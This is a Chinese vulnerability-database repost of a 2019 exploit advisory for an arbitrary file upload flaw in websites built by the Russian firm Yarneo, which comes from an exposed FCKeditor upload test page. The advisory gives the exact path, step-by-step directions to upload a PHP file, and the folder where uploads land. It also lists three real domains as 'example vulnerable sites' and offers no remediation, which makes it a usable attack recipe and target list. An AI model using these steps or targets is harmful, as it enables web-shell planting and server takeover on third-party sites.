ЯрНео Разработка сайтов Yarneo WebDesign Unauthorized File Insertion - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1617686 漏洞类型
发布时间 2019-05-21 更新时间 2019-05-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019050232
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
####################################################################

# Exploit Title : ЯрНео Разработка сайтов Yarneo WebDesign Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : yarneo.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Yarneo is a Web Design and Development Company in Russia.

####################################################################

# Impact :
***********
Yarneo is prone to a vulnerability that lets attackers upload arbitrary files because 
it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/fckeditor/editor/filemanager/connectors/uploadtest.html

Select the "File Uploader" to use : Choose PHP and upload your file.

Directory File Path :
**********************
/pic/userfile/[YOURFILENAME].txt .jpg .gif .png

####################################################################

# Example Vulnerable Sites :
************************
[+] xn--1-7sb3aeok0dwc.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] xn--l1adfni2d.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] xn--90auhhdlh4g.xn--p1ai/fckeditor/editor/filemanager/connectors/uploadtest.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################